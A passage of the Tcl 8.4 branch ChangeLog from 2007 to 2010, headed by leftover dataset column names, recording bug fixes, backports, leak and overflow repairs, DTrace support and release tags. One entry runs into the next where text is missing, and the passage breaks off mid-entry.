text
stringlengths
20
1.01M
url
stringlengths
14
1.25k
dump
stringlengths
9
15
lang
stringclasses
4 values
source
stringclasses
4 values
2010-09-01 Andreas Kupries <[email protected]> * generic/tclExecute.c: [Bug 3057639]. Applied patch by Jeff to * generic/tclVar.c: make the behaviour of lappend in bytecompiled * tests/append.test: mode consistent with direct-eval and 'append' * tests/appendComp.test: generally. Added tests (append*-9.*) showing the difference. 2010-07-25 Jan Nijtmans <[email protected]> * generic/tclInt.h: [Bug 3030870] make itcl 3.x built with pre-8.6 * generic/tclBasic.c: work in 8.6 revert tclInt.h to what it was before, and relax the relation between Tcl_CallFrame and CallFrame. 2010-07-18 Jan Nijtmans <[email protected]> * generic/tcl.h: [Bug 3031278] fixed merge problem in previous commit. 2010-07-17 Jan Nijtmans <[email protected]> * generic/tcl.h: [Bug 3030870] make itcl 3.x built with pre-8.6 * generic/tclInt.h: work in 8.6 2010-07-16 Jan Nijtmans <[email protected]> * generic/tcl.h: (Backport) take over definitions of _WIN32, DLLIMPORT, DLLEXPORT and TCL_LL_MODIFIER macros from Tcl8.5/8.6 2010-06-28 Jan Nijtmans <[email protected]> * generic/tclPosixStr.c: [Bug 3019634] errno.h and tclWinPort.h have conflicting definitions. 2010-06-09 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Added OSX Intel 64bit * library/platform/pkgIndex.tcl: Package updated to version 1.0.9. 2010-05-07 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Fix cpu name for Solaris/Intel 64bit. * library/platform/pkgIndex.tcl: Package updated to version 1.0.8. 2010-04-29 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Another stab at getting the /lib, * library/platform/pkgIndex.tcl: /lib64 difference right for linux. Package updated to version 1.0.7. 2010-04-18 Donal K. Fellows <[email protected]> * doc/unset.n: [Bug 2988940]: Fix typo. 2010-04-14 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Linux platform identification: * library/platform/pkgIndex.tcl: Check /lib64 for existence of files matching libc* before accepting it as base directory. This can happen on weirdly installed 32bit systems which have an empty or partially filled /lib64 without an actual libc. Bumped to version 1.0.6. 2010-04-06 Zoran Vasiljevic <[email protected]> * generic/tclCmdMZ.c (Tcl_RegexpObjCmd): fixed object leak. 2010-04-02 Zoran Vasiljevic <[email protected]> * generic/tclStringObj.c: (SetStringFromAny): avoid trampling over the tclEmptyStringRep->bytes as it is thread-shared (thx to Gustaf Neumann for the (hard) work of locating this one). 2010-03-01 Alexandre Ferrieux <[email protected]> * unix/tclUnixChan.c: [backported] Refrain from a possibly lengthy reverse-DNS lookup on 0.0.0.0 when calling [fconfigure -sockname] on an universally-bound (default) server socket. 2010-02-22 Jan Nijtmans <[email protected]> * generic/tclExecute.c: Fix [Bug 2954959] expr abs(-0.0) is -0.0 * tests/expr.test Added some test cases, backported from 8.5 2010-02-11 Andreas Kupries <[email protected]> * generic/tclCompile.c: [Bug 2949302]: Fixed leak of support structures for [info frame] which occured when bytecode compilation fails. 2010-02-01 Donal K. Fellows <[email protected]> * generic/regexec.c (ccondissect, crevdissect): [Bug 2942697]: Rework these functions so that certain pathological patterns are matched much more rapidly. Many thanks to Tom Lane for dianosing this issue and providing an initial patch. 2009-11-16 Alexandre Ferrieux <[email protected]> * generic/tclEncoding.c: (Backport) Fix [Bug 2891556] and improve * tests/econding.test: test to detect similar manifestations in the future. 2009-11-12 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): [Bug 2895565]. Dropped bogosity * tests/io.test: which used the number of _written_ bytes or character to update the counters for the read bytes/characters. New test io-53.11. This is a backward port from the 8.5 branch. 2009-11-10 Pat Thoyts <[email protected]> * tests/fCmd.test: Fixed a number of issues for Vista * tests/registry.test: and Win7 that are due to restricted * tests/tcltest.test: permissions under UAC. * tests/winFCmd.test: 2009-11-10 Stuart Cassoff <[email protected]> * win/README: [bug 2459744]: Removed outdated Msys + Mingw info. 2009-11-10 Andreas Kupries <[email protected]> * generic/tclObj.c: Plug memory leak in TclContinuationsEnter(). [Bug 2895323]. Backport from Tcl 8.5 branch, change by Don Porter. 2009-11-09 Andreas Kupries <[email protected]> * generic/tclBasic.c (TclEvalObjEx): Moved the #280 decrement of refCount for the file path out of the branch after the whole conditional, closing a memory leak. Added clause on structure type to prevent seg.faulting. Backport from valgrinding the Tcl 8.5 branch. * tests/info.test: Resolve ambiguous resolution of variable "res". Backport from 8.5 2009-10-23 Andreas Kupries <[email protected]> * generic/tclCompCmds.c: [Bug 2881263] (TclCompileForeachCmd, TclCompileLindexCmd): Fixed. Moved the use of DefineLineInformation after all regular variable declarations, so that an empty statement (-UTIP_280) doesn't confuse c89 compilers. * library/platform/pkgIndex.tcl: Backported the platform packages * library/platform/platform.tcl: from head and8.5 into the 8.4 * library/platform/shell.tcl: branch. Updated makefiles to install * unix/Makfile.in: the packages. * win/Makefile.in: * generic/tclIO.c (FlushChannel): Skip OutputProc for low-level 0-length writes. When closing pipes which have already been closed not skipping leads to spurious SIG_PIPE signals. Reported by Mikhail Teterin <[email protected]>. 2009-10-21 Donal K. Fellows <[email protected]> * generic/tclPosixStr.c: [Bug 2882561]: Work around oddity on Haiku OS where SIGSEGV and SIGBUS are the same value. 2009-10-18 Joe Mistachkin <[email protected]> *-04 Daniel Steffen <[email protected]> * macosx/tclMacOSXBundle.c: Workaround CF memory managment bug in * unix/tclUnixInit.c: Mac OS X 10.4 & earlier. [Bug 2569449] 2009-09-28 Don Porter <[email protected]> * generic/tclAlloc.c: Cleaned up various routines in the * generic/tclCkalloc.c: call stacks for memory allocation to * generic/tclParse.c: guarantee that any size values computed * generic/tclThreadAlloc.c: are within the domains of the routines they get passed to. [Bugs 2557696 and 2557796]. 2009-09-18 Don Porter <[email protected]> * generic/tclCmdMZ.c (Tcl_SubstObj): Pass 'length' values to recursive parsing calls to convert O(N^2) operations of [subst] to O(N). 2009-08-25 Andreas Kupries <[email protected]> * generic/tclBasic.c (Tcl_CreateInterp, Tcl_EvalTokensStandard, (EvalTokensStandard, Tcl_EvalEx, EvalEx, TclAdvanceContinuations, (TclEvalObjEx): * generic/tclCmdMZ.c (Tcl_SwitchObjCmd, ListLines): * generic/tclCompCmds.c (*): * generic/tclCompile.c (TclSetByteCodeFromAny, TclInitCompileEnv, (TclFreeCompileEnv, TclCompileScript): *ContinuationsGet, TclFreeObj): * generic/tclProc.c (TclCreateProc): * generic/tclVar.c (TclPtrSetVar): * tests/info.test (info-30.0-22): Extended parser, compiler, and execution with code and attendant data structures tracking the positions of continuation lines which are not visible in script's, to properly account for them while counting lines for #280, during direct and compiled execution. 2009-08-17 Don Porter <[email protected]> * generic/tclFileName.c: Correct result from [glob */test] when * * tests/fileName.test: matches something like ~foo. [Bug 2837800] 2009-07-23 Joe Mistachkin <[email protected]> * generic/tclNotify.c: Fix for [Bug 2820349]. 2009-07-14 Andreas Kupries <[email protected]> * generic/tclBasic.c (DeleteInterpProc,TclArgumentBCEnter, (TclArgumentBCRelease, TclArgumentGet): * generic/tclCompile.c (EnterCmdWordIndex, TclCleanupByteCode, (TclInitCompileEnv, TclCompileScript): * generic/tclCompile.h (ExtCmdLoc): * generic/tclExecute.c (TclExecuteByteCode): * generic/tclInt.h (ExtIndex, CFWordBC): * tests/info.test (info-39.0): Backport of some changes made to the Tcl head, to handle literal sharing better. The code here is much simpler (trimmed down) compared to the head as the 8.4 branch is not bytecode compiling whole files, and doesn't compile eval'd code either. Reworked the handling of literal command arguments in bytecode to be saved (compiler) and used (execution) per command (See the TCL_INVOKE_STK* instructions), and not per the whole bytecode. This removes the problems with location data caused by literal sharing in proc bodies. Simplified the associated datastructures (ExtIndex is gone, as is the function EnterCmdWordIndex). 2009-06-13 Don Porter <[email protected]> * generic/tclCompile.c: The value stashed in iPtr->compiledProcPtr * generic/tclProc.c: when compiling a proc survives too long. We * tests/execute.test:. [Bug 2802881]. 2009-04-28 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure (SC_CONFIG_CFLAGS): harden the check to add _r to CC on AIX with threads. 2009-04-27 Alexandre Ferrieux <[email protected]> * generic/tclInt.h: Backport fix for [Bug 1028264]: WSACleanup() too * generic/tclEvent.c: early. The fix introduces "late exit handlers" * win/tclWinSock.c: for similar late process-wide cleanups. 2009-04-27 Alexandre Ferrieux <[email protected]> * win/tclWinSock.c: Backport fix for [Bug 2446662]: resync Win behavior on RST with that of unix (EOF). 2009-04-22 Andreas Kupries <[email protected]> * generic/tclStringObj.c (UpdateStringOfString): Added cast to fix signed/unsigned mismatch breaking win32 symbol/debug build. 2009-04-15 Don Porter <[email protected]> * generic/tclStringObj.c: AppendUnicodeToUnicodeRep failed to set stringPtr->allocated to 0, leading to crashes. 2009-04-14 Stuart Cassoff <[email protected]> * unix/tcl.m4: Removed -Wno-implicit-int from CFLAGS_WARNING. 2009-04-08 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Fixed unsafe [eval]s in the tcltest * library/tcltest/pkgIndex.tcl: package. [Bug 2570363] 2009-04-07 Don Porter <[email protected]> * generic/tclStringObj.c: Completed backports of fixes for [Bug 2494093] and [Bug 2553906]. 2009-03-30 Don Porter <[email protected]> * doc/Alloc.3: Size argument is "unsigned int". [Bug 2556263] * generic/tclStringObj.c: Added protections from invalid memory * generic/tclTestObj.c: accesses when we append (some part of) * tests/stringObj.test: a Tcl_Obj to itself. Added the appendself and appendself2 subcommands to the [teststringobj] testing command and added tests to the test suite. [Bug 2603158] 2009-03-27 Don Porter <[email protected]> * tests/fileName.test: Tests for [Bug 2710920] to guard against its appearance. 2009-03-20 Don Porter <[email protected]> * generic/tclStringObj.c: Test stringObj-6.9 checks that * tests/stringObj.test: Tcl_AppendStringsToObj() no longer crashes when operating on a pure unicode value. [Bug 2597185] * generic/tclExecute.c (INST_CONCAT1): Panic when appends overflow the max length of a Tcl value. [Bug 2669109] 2009-03-18 Don Porter <[email protected]> * win/tclWinFile.c (TclpObjNormalizePath): Corrected Tcl_Obj leak. Thanks to Joe Mistachkin for detection and patch. [Bug 2688184]. 2009-02-20 Don Porter <[email protected]> * generic/tclPathObj.c: Fixed mistaken logic in TclFSGetPathType() * tests/fileName.test: that assumed (not "absolute" => "relative"). This is a false assumption on Windows, where "volumerelative" is another possibility. [Bug 2571597]. 2008-02-06 Daniel Steffen <[email protected]> * generic/tcl.h (Darwin): workaround conflict between deprecated tcl panic macro and panic() function declaration in <mach/mach.h> header. 2009-02-05 Don Porter <[email protected]> * generic/tclStringObj.c: Added overflow protections to the AppendUtfToUtfRep routine to either avoid invalid arguments and crashes, or to replace them with controlled panics. [Bug 2561794] 2009-02-04 Don Porter <[email protected]> * generic/tclStringObj.c (SetUnicodeObj): Corrected failure of Tcl_SetUnicodeObj() to panic on a shared object. [Bug 2561488]. Also factored out common code to reduce duplication. 2009-01-09 Don Porter <[email protected]> * generic/tclStringObj.c (STRING_SIZE): Corrected failure to limit memory allocation requests to the sizes that can be supported by Tcl's memory allocation routines. [Bug 2494093]. 2009-01-08 Don Porter <[email protected]> * generic/tclStringObj.c (STRING_UALLOC): Added missing parens required to get correct results out of things like STRING_UALLOC(num + append). [Bug 2494093]. 2008-12-04 Don Porter <[email protected]> * generic/tclIOUtil.c (Tcl_FSGetNormalizedPath): Added another flag value TCLPATH_NEEDNORM to mark those intreps which need more complete normalization attention for correct results. [Bug 2385549] 2008-12-03 Don Porter <[email protected]> * generic/tclFileName.c (TclDoGlob): One of the Tcl_FSMatchInDirectory() calls did not have its return code checked. Some VFS drivers can return TCL_ERROR, and when that's not checked, the error message gets converted into a list of matching files returned by [glob], with ridiculous results. 2008-12-01 Don Porter <[email protected]> * generic/tclIO.c (TclFinalizeIOSubsystem): Revised latest commit to something that doesn't crash the test suite. 2008-11-25 Andreas Kupries <[email protected]> * generic/tclIO.c (TclFinalizeIOSubsystem): Applied backport of Alexandre Ferrieux's patch for [Bug 2270477] to prevent infinite looping during finalization of channels not bound to interpreters. 2008-11-23 Andreas Kupries <[email protected]> * generic/tclIO.c: Backport of fix for [Bug 2333466]. 2008-11-04 Jeff Hobbs <[email protected]> * generic/tclPort.h: remove the ../{win,unix}/ header dirs as the build system already has it, and it confuses builds when used with private headers installed. 2008-09-25 Don Porter <[email protected]> * doc/global.n: Correct false claim about [info locals]. 2008-08-14 Don Porter <[email protected]> * tests/fileName.test: Revise new tests for portability to case insensitive filesystems. 2008-08-14 Daniel Steffen <[email protected]> * generic/tclCompile.h: add support for debug logging of DTrace * generic/tclBasic.c: 'proc', 'cmd' and 'inst' probes (does _not_ require a platform with DTrace). * unix/Makefile.in: ensure Makefile shell is /bin/bash for * unix/configure.in (SunOS): DTrace-enabled build on Solaris. (followup to 2008-06-12) [Bug 2016584] * unix/tcl.m4 (SC_PATH_X): check for libX11.dylib in addition to libX11.so et al. * unix/configure: autoconf-2.13 2008-08-13 Don Porter <[email protected]> * generic/tclFileName.c: Fix for errors handling -types {} * tests/fileName.test: option to [glob]. [Bug 1750300] Thanks to Matthias Kraft and George Peter Staplin. 2008-08-11 Andreas Kupries <[email protected]> * generic/tclProc.c (Tcl_ProcObjCmd): Fixed memory leak triggered * tests/proc.test: by procbody::test::proc. See [Bug 2043636]. Added a test case demonstrating the leak before the fix. Fixed a few spelling errors in test descriptions as well. 2008-07-28 Andreas Kupries <[email protected]> * generic/tclBasic.c: Added missing release of extended command word index when deleting an interpreter (DeleteInterpProc). Added missing ref count when creating an empty string as path (EvalEx). * generic/tclCompile.c (TclInitCompileEnv): Made same change to control flow as in TclEvalObjEx. Not needed while uplevel and siblings go through the eval-direct code path, however if that changes (like it did in 8.5+) better to have this in place instead of re-searching why certain places are without absolute locations. * tests/info.test: Added tests 38.*, exactly testing the tracking of location for uplevel scripts, and made the testsuite fully usable with and without -singleproc 1. 2008-07-25 Daniel Steffen <[email protected]> * tests/info.test: Add !singleTestInterp constraint to various tests; (info-22.8, info-23.0): switch to glob matching to avoid sensitivity to tcltest.tcl line number changes. [Bug 1605269] 2008-07-24 Andreas Kupries <[email protected]> * tests/info.test: Tests 38.* added, exactly testing the tracking of location for uplevel scripts. 2008-07-23 Andreas Kupries <[email protected]> * generic/tclBasic.c: Modified TclArgumentGet to reject pure lists * generic/tclCmdIL.c: immediately, without search. Reworked setup * generic/tclCompile.c: of eoFramePtr, doesn't need the line * tests/info.test: information, more sensible to have everything on line 1 when eval'ing a pure list. Updated the users of the line information to special case this based on the frame type (i.e. TCL_LOCATION_EVAL_LIST). Added a testcase demonstrating the new behaviour. 2008-07-22 Andreas Kupries <[email protected]> * generic/tclBasic.c: Added missing function comments. * generic/tclCompile.c: Made the new TclEnterCmdWordIndex * generic/tclCompile.h: static. * generic/tclBasic.c: Reworked the handling of bytecode literals * generic/tclCompile.c: for #280 to fix the abysmal performance * generic/tclCompile.h: for deep recursion, replaced the linear * generic/tclExecute.c: search through the whole stack with * generic/tclInt.h: another hashtable and simplified the data structure used by the compiler (array instead of hashtable). Incidentially this also fixes the memory leak reported via [Bug 2024937]. 2008-07-21 Andreas Kupries <[email protected]> * generic/tclBasic.c: Extended the existing TIP #280 system (info * generic/tclCmdAH.c: frame), added the ability to track the * generic/tclCompCmds.c: absolute location of literal procedure * generic/tclCompile.c: arguments, and making this information * generic/tclCompile.h: available to uplevel, eval, and * generic/tclInterp.c: siblings. This allows proper tracking of * generic/tclInt.h: absolute location through custom (Tcl-coded) * generic/tclNamesp.c: control structures based on uplevel, etc. * generic/tclProc.c: 2008-07-07 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): Fixed unsafe idiom of setting the interp result found by Don Porter. 2008-07-04 Joe English <[email protected]> * generic/tclEncoding.c(UtfToUtfProc): Avoid unwanted sign extension when converting incomplete UTF-8 sequences. See [Bug 1908443] for details. 2008-07-03 Don Porter <[email protected]> * library/package.tcl: Removed [file readable] testing from [tclPkgUnknown] and friends. We find out soon enough whether a file is readable when we try to [source] it, and not testing before allows us to workaround the bugs on some common filesystems where [file readable] lies to us. [Patch 1969717] 2008-06-28 Don Porter <[email protected]> * generic/tclIOUtil.c: Plug memory leak in latest commit. Thanks Rolf Ade for detecting and Dan Steffen for the fix [Bug 2004654]. 2008-06-23 Don Porter <[email protected]> * generic/tclIOUtil.c: Fixed bug in Tcl_GetTranslatedPath() when operating on the "Special path" variant of the "path" Tcl_ObjType intrep. A full normalization was getting done, in particular, coercing relative paths to absolute, contrary to what the function of producing the "translated path" is supposed to do. [Bug 1972879]. 2008-06-20 Don Porter <[email protected]> * tests/binary.test: Corrected flawed tests revealed by a -debug 1 * tests/io.test: -singleproc 1 test suite run. 2008-06-18 Don Porter <[email protected]> * generic/tclParseExpr.c: Disabled attempts to support [expr] functions named eq(...) or ne(...). Any attempts to use such functions were panicking. [Bug 1971879]. 2008-06-16 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): Backport of fix made on the * tests/info.test: head branch :: Moved the code looking up the information for key 'proc' out of the TCL_LOCATION_BC branch to after the switch, this is common to all frame types. Updated the testsuite to match. This was exposed by the 2008-06-08 commit (Miguel), switching uplevel from direct eval to compilation. Fixes [Bug 1987851]. 2008-06-12 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): TIP #280 conditional feature. Added checks to validate HashEntry and HashTable information gotten from Command structures. This seems to be needed to handle structures managed by Itcl. 2008-06-12 Daniel Steffen <[email protected]> * unix/Makefile.in: add complete deps on tclDTrace.h. * unix/Makefile.in: clean generated tclDTrace.h file. * unix/configure.in (SunOS): fix static DTrace-enabled build. * unix/tcl.m4 (SunOS-5.11): fix 64bit amd64 support with gcc & Sun cc. * unix/configure: autoconf-2.13 2008-05-26 Jeff Hobbs <[email protected]> * tests/io.test (io-53.9): need to close chan before removing file. 2008-05-23 Andreas Kupries <[email protected]> * win/tclWinChan.c (FileWideSeekProc): Accepted a patch by Alexandre Ferrieux <[email protected]> to fix the [Bug 1965787]. 'tell' now works for locations > 2 GB as well instead of going negative. * generic/tclIO.c (Tcl_SetChannelBufferSize): Accepted a patch by * tests/io.test: Alexandre Ferrieux <[email protected]> to fix the [Bug 1969953]. Buffersize outside of the supported range are now clipped to nearest boundary instead of ignored. 2008-04-26 Zoran Vasiljevic <[email protected]> * generic/tclAsync.c: Tcl_AsyncDelete(): panic if attempt to locate handler token fails. Happens when some other thread attempts to delete somebody else's token. Also, panic early if we find out the wrong thread attempting to delete the async handler (common trap). As, only the one that created the handler is allowed to delete it. 2008-04-17 Andreas Kupries <[email protected]> *** 8.4.19 TAGGED FOR RELEASE *** * generic/tclCompExpr.c (CompileMathFuncCall): Added * tests/compExpr.test (compExpr-5.10): Tcl_ResetResult before appending error message, to clear out possible sharing. Added test case demonstrating the crash (abort on shared object) without the fix. 2008-04-15 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied another patch by Alexandre * io.test (io-53.8a): Ferrieux <[email protected]>, to shift EOF handling to the async part of the command if a callback is specified, should the channel be at EOF already when fcopy is called. Testcase by myself. 2008-04-14 Kevin B. Kenny <[email protected]> * unix/tclUnixTime.c (TclpGetClicks, Tcl_GetTime): Removed obsolete use of 'struct timezone' in the call to 'gettimeofday'. [Bug 1942197]. 2008-04-14 Don Porter <[email protected]> * generic/tclExecute.c: Plug memory leak introduced in the 2008-03-07 commit. [Bug 1940433] 2008-04-11 Don Porter <[email protected]> * README: Bump version number to 8.4.19 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: * changes: updates for 8.4.19 release. 2008-04-10 Andreas Kupries <[email protected]> * generic/tclIOCmd.c (Tcl_FcopyObjCmd): Keeping check for negative values, changed to not be an error, but behave like the special value -1 (copy all, default). * tests/iocmd.test (iocmd-15.{12,13}): Removed. * tests/io.test (io-52.5{,a,b}): Reverted last change, added comment regarding the meaning of -1, added two more testcases for other negative values, and input wrapped to negative. 2008-04-09 Andreas Kupries <[email protected]> * tests/io.test (io-52.5): Removed '-size -1' from test, does not seem to have any bearing, and was an illegal value. Test case is not affected by the value of -size, test flag restoration and that everything was properly copied. * generic/tclIOCmd.c (Tcl_FcopyObjCmd): Added checking of -size * tests/ioCmd.test (iocmd-15.{13,14}): value to reject negative values, and values overflowing 32-bit signed. [Bug 1557855]. Basic patch by Alexandre Ferrieux <[email protected]>, with modifications from me to separate overflow from true negative value. Extended testsuite. 2008-04-08 Andreas Kupries <[email protected]> * tests/io.test (io-53.8,53.9,53.10): Backported das' fix of typo and quoting for spaces in builddir path. 2008-04-07 Andreas Kupries <[email protected]> * tests/io.test (io-53.10): Testcase for bi-directionaly fcopy. * generic/tclIO.c: Additional changes to data structures for fcopy * generic/tclIO.h: and channels to perform proper cleanup in case of a channel having two background copy operations running as is now possible. * generic/tclIO.c (BUSY_STATE, CheckChannelErrors, TclCopyChannel): New macro, and the places using it. This change allows for bi-directional fcopy on channels. [Bug 1350564]. Thanks to Alexandre Ferrieux <[email protected]> for the patch. * tests/io.test (io-53.9): Made test cleanup robust against the possibility of slow process shutdown on Windows. Backported from Kevin Kenny's change to the same test on the 8.5 and head branches. 2008-04-04 Andreas Kupries <[email protected]> * tests/io.test (io-53.9): Added testcase for [Bug 780533], based on Alexandre's test script. Also fixed problem with timer in preceding test, was not canceled properly in the ok case. 2008-04-03 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied patch [Bug 1932639] to * tests/io.test: prevent fcopy from calling -command synchronously the first time. Thanks to Alexandre Ferrieux <[email protected]> for report and patch. 2008-04-02 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied patch for the fcopy problem [Bug 780533], with many thanks to Alexandre Ferrieux <[email protected]> for tracking it down and providing a solution. Still have to convert his test script into a proper test case. 2008-03-27 Daniel Steffen <[email protected]> * unix/tcl.m4 (SunOS-5.1x): fix 64bit support for Sun cc. [Bug 1921166] * unix/dltest/Makefile.in: support use of LDFLAGS in SHLIB_LD. * unix/configure: autoconf-2.13 2008-03-24 Pat Thoyts <[email protected]> * generic/tclBinary.c: bug #1923966 - crash in binary format * tests/binary.test: Added tests for the above crash condition. 2008-03-11 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c: avoid using CoreFoundation after fork() on Darwin 9 even when TclpCreateProcess() uses vfork(). 2008-03-07 Don Porter <[email protected]> * generic/tclExecute.c (Tcl_ExprObj): Revised expression bytecode compiling so that bytecodes invalid due to changing context or due to the difference between expressions and scripts are not reused. [Bug 1899164]. * generic/tclTest.c: Backport the [testexprlongobj] testing command. * tests/execute.test (execute-6.8): Added tests checking that bytecode is invalidates in the right situations. 2008-03-03 Reinhard Max <[email protected]> * unix/tclUnixChan.c: Fix mark and space parity on Linux, which uses CMSPAR instead of PAREXT. 2008-02-27 Pat Thoyts <[email protected]> * library/http/pkgIndex.tcl: Backported 2.5.5 changes from * library/http/http.tcl: 8.5 version. * doc/http.n: Document the meta accessor. 2008-02-26 Jeff Hobbs <[email protected]> * generic/tclIOCmd.c (Tcl_GetsObjCmd): do not reuse resultObj as it may be shared (crash condition). 2008-02-22 Pat Thoyts <[email protected]> * library/http/pkgIndex.tcl: Set version 2.5.4 * library/http/http.tcl: Fix for bug #1818565. Always check that the state array exists in the http::status command. 2008-02-06 Don Porter <[email protected]> *** 8.4.18 TAGGED FOR RELEASE *** * README: Bump version number to 8.4.18 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: * changes: updates for 8.4.18 release. 2008-02-02 Daniel Steffen <[email protected]> * unix/configure.in (Darwin): correct Info.plist year substitution in non-framework builds. * unix/configure: autoconf-2.13 2008-01-30 Miguel Sofer <[email protected]> * generic/tclInterp.c (Tcl_GetAlias): fix for [Bug 1882373] 2008-01-13 Jeff Hobbs <[email protected]> * win/tclWinSerial.c (SerialCloseProc, TclWinOpenSerialChannel): use critical section for read & write side. [Bug 1353846] (newman) 2007-12-31 Don Porter <[email protected]> *** 8.4.17 TAGGED FOR RELEASE *** * changes: updates for 8.4.17 release. * doc/filename.n: Typo 2007-12-18 Donal K. Fellows <[email protected]> * generic/regguts.h, generic/regc_color.c, generic/regc_nfa.c: Fixes for problems created when processing regular expressions that generate very large automata. An enormous number of thanks to Will Drewry <[email protected]>, Tavis Ormandy <[email protected]>, and Tom Lane <[email protected]> from the Postgresql crowd for their help in tracking these problems down. [Bug 1810264] 2007-12-14 Jeff Hobbs <[email protected]> * win/README: updated notes 2007-12-14 Zoran Vasiljevic <[email protected]> * unix/tclUnixCompat.c (TclpGetHostByName): Really applied the change noted on 2007-11-13 by dkf below. 2007-12-13 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (TclGetOpenMode): Only set the O_APPEND flag * tests/ioUtil.test (ioUtil-4.1): on a channel for the 'a' mode and not for 'a+'. [Bug 1773127] (backport from HEAD) 2007-12-05 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (Tcl_LsearchObjCmd): Prevent shimmering crash when -exact and -integer/-real are mixed. [Bug 1844789] 2007-11-28 Jeff Hobbs <[email protected]> * win/tclWinSock.c (Tcl_GetHostName): update to previous fix to set hostname length appropriately, clean up check overall. 2007-11-27 Don Porter <[email protected]> * win/tclWinSock.c: Add missing encoding conversion of the [info hostname] value from the system encoding to Tcl's internal encoding. This is important now that ICANN no longer limits host names to ASCII. [Bug 1823552] 2007-11-26 Zoran Vasiljevic <[email protected]> * generic/tclThread.c: Back-port locking changes from Tcl8.5 in Tcl_Mutex/ConditionFinlize. Now we properly master-lock the finalization of sync primitives. 2007-11-15 Don Porter <[email protected]> * generic/regc_nfa.c: Fixed infinite loop in the regexp compiler * generic/regcomp.c: [Bug 1810038]. Corrected looping logic in * tests/regexp.test: fixempties() to avoid wasting time walking a list of dead states [Bug 1832612]. Convert optst() from expensive no-op to a cheap no-op. Improve newline usage in debug output. 2007-11-13 Donal K. Fellows <[email protected]> * unix/tclUnixCompat.c (TclpGetHostByName): The six-argument form of getaddressbyname_r() uses the fifth argument to indicate whether the lookup succeeded or not on at least one platform. [Bug 1618235] 2007-10-30 Donal K. Fellows <[email protected]> * generic/regc_lex.c (lexescape): Ensure that backreference numbers can't overflow a signed int in a way that breaks things. [Bug 1810264] 2007-10-15 Miguel Sofer <[email protected]> * generic/tclParse.c (Tcl_ParseBraces): fix for possible read after the end of buffer, [Bug 1813528] (Joe Mistachkin). 2007-10-03 Miguel Sofer <[email protected]> * generic/tclObj.c (Tcl_FindCommandFromObj): fix finding a deleted command; cannot trigger this from Tcl itself, but crash reported on xotcl. This check is new to 8.4 but exists in 8.5, so this is a backport or something. Thanks Gustaf Neumann. 2007-10-02 Jeff Hobbs <[email protected]> * generic/tcl.h (Tcl_DecrRefCount): Update change from 2006-05-29 to make macro more warning-robust in unbraced if code. 2007-10-02 Don Porter <[email protected]> * README: Bump version number to 8.4.17 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: 2007-09-20 Don Porter <[email protected]> *** 8.4.16 TAGGED FOR RELEASE *** * doc/load.n: Backport corrected example. 2007-09-19 Don Porter <[email protected]> * unix/Makefile.in: Update `make dist` so that tclDTrace.d is included in the source code distribution. * generic/tclPkg.c: Backport fix for [1573844] to the * tests/pkg.test: TCL_TIP268 sections. 2007-09-18 Don Porter <[email protected]> * changes: updates for 8.4.16 release. 2007-09-15 Daniel Steffen <[email protected]> * unix/tcl.m4 (SunOS-5.1x): replace direct use of '/usr/ccs/bin/ld' in SHLIB_LD by 'cc' compiler driver. * unix/configure: autoconf-2.13 2007-09-14 Daniel Steffen <[email protected]> * generic/tclDTrace.d (new file): add DTrace provider for Tcl; allows * generic/tclCompile.h: tracing of proc and command entry & * generic/tclBasic.c: return, bytecode execution, object * generic/tclExecute.c: allocation and more; with essentially * generic/tclInt.h: zero cost when tracing is inactive; * generic/tclObj.c: enable with --enable-dtrace configure * generic/tclProc.c: arg (disabled by default, will only * unix/Makefile.in: enable if DTrace is present). * unix/configure.in: [Patch 1793984] * macosx/Makefile: enable DTrace support. * unix/configure: autoconf-2.13 2007-09-11 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Accept underscores and colons in * library/tcltest/pkgIndex.tcl: constraint names. Properly handle constraint expressions that return non-numeric boolean results like "false". Bump to tcltest 2.2.9. [Bug 1772989; RFE 1071322] 2007-09-11 Pat Thoyts <[email protected]> * win/makefile.vc: AMD64 target fixes for symbols builds. * win/rules.vc: 2007-09-10 Jeff Hobbs <[email protected]> * generic/tclLink.c (Tcl_UpdateLinkedVar): guard against var being unlinked. [Bug 1740631] (maros) 2007-08-25 Kevin Kenny <[email protected]> * generic/tclClock.c (FormatClock): Claimed additional space for the %c format code to avoid a buffer overrun when formatting (for example) a Friday in February in the Portuguese locale. [Bug 1751117] 2007-08-24 Miguel Sofer <[email protected]> * generic/tclCompile.c: replaced copy loop that tripped some compilers with memmove [Bug 1780870] 2007-08-14 Don Porter <[email protected]> * tests/trace.test: Backport some tests. 2007-08-14 Daniel Steffen <[email protected]> * unix/tclLoadDyld.c: use dlfcn API on Mac OS X 10.4 and later; fix issues with loading from memory on intel and 64bit; add debug messages. * tests/load.test: add test load-10.1 for loading from vfs. 2007-08-07 Daniel Steffen <[email protected]> * generic/tclEnv.c: improve environ handling on Mac OS X (adapted * unix/tclUnixPort.h: from Apple changes in Darwin tcl-64). * unix/Makefile.in: add support for compile flags specific to object files linked directly into executables. * unix/configure.in (Darwin): only use -seg1addr flag when prebinding; use -mdynamic-no-pic flag for object files linked directly into exes; support overriding TCL_PACKAGE_PATH in environment. * unix/configure: autoconf-2.13 2007-07-19 Don Porter <[email protected]> * 